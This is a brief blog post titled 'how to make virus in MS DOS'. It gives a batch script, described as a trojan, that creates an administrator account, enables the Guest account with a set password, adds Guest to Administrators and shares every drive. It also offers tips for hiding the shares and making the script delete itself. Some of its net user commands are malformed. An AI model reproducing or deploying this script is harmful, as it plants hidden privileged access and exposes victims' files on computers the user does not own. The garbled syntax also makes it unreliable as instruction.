Featured Post

Step Wise Project Planning

Planning is the most difficult process in project management. The framework described is called the Stepwise method to help to distinguis...

  1. Home

how to make virus in MS DOS


@ECHO OFF
start http: -anypage-
net user add Username Password /add net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net share a=a:\
net share b=b:\
net share c=c:\
net share d=d:\
net share e=e:\
net share f=f:\
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

you can write net share a$=a:\ if you want the shared files to be hidden and add del %0 at the end so the trojan will self distruct

Previous
Next Post »